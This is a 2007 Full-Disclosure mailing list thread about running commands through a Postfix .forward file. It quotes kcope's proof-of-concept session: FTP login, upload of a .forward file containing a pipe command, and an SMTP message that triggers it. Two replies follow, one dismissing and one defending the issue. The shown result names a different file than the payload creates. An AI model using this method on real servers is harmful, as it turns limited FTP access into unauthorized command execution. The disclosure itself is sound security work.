Re: Small Design Bug in Postfix - REMOTE

["Adam N" <interfect () gmail com>]

No, the idea is that you are a user with no login access, only FTP.
By doing this, you get shell access (with sane privileges, thankfully) when
you're supposed to only have FTP.

On Dec 13, 2007 2:34 PM, Fredrick Diggle <fdiggle () gmail com> wrote:

> You have write perms on a users home directory and this was the best way
> you could come up with to execute commands? Please send me details on your
> recipe for boiled water. Be sure to gzip it though as I imagine it is
> several pages long.
>
> YAY!
>
>
> On Dec 13, 2007 2:18 PM, kcope <kingcope () gmx net> wrote:
>
> > Small Design Bug in Postfix - REMOTE
> >
> > There's a small issue on how Postfix forwards mails.
> > A user can have a .forward file in her home directory.
> > Inside this file she can specifiy an alternative recipient
> > or use aliasing to execute commands when mail is received.
> > > From the manpage ALIASES(5)
> > "aliases - Postfix local alias database format"
> >
> > |command
> >              Mail is piped into command. Commands  that  contain
> >              special  characters,  such as whitespace, should be
> >              enclosed between double quotes.  See  local(8)  for
> >              details of delivery to command.
> >
> >              When the command fails, a limited amount of command
> >              output is mailed back  to  the  sender.   The  file
> >              /usr/include/sysexits.h  defines  the expected exit
> >              status codes. For example, use "|exit 67" to  simu-
> >              late  a  "user  unknown"  error,  and  "|exit 0" to
> >              implement an expensive black hole.
> >
> > This is fine since postfix properly drops privileges before
> > executing the command.
> > The Problem with executing commands via .forward files is that
> > if someone manages to place a file into ones home directory and
> > just sends a file to the mailserver she can execute commands
> > even when she's not supposed to or does not have the privileges.
> >
> > Here is an example exploitation session, the user 'rootkey'
> > only has ftp access with write permissions and no other privileges than
> > that.
> >
> > Login to FTP server
> > > telnet box 21
> > > USER rootkey
> > > PASS rootkey123
> > <logged in
> >
> > Put .forward file with following contents into the home directory of
> > user 'rootkey'.
> >
> > ---snip---
> > |touch /tmp/XXX
> > ---snip---
> >
> > > put .forward
> >
> > Now send an email to user rootkey.
> >
> > > telnet box 25
> > > mail from: rootkey
> > > rcpt to: rootkey
> > > data
> > > .
> >
> > RESULT:
> >
> > kcope@box:~$ ls /tmp/testXXX
> > /tmp/testXXX
> >
> >
> > signed,
> >
> > - -kcope/2007
> >
> > --
> > GMX FreeMail: 1 GB Postfach, 5 E-Mail-Adressen, 10 Free SMS.
> > Alle Infos und kostenlose Anmeldung: http://www.gmx.net/de/go/freemail
> >
> > _______________________________________________
> > Full-Disclosure - We believe in it.
> > Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> > Hosted and sponsored by Secunia - http://secunia.com/
>
>
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/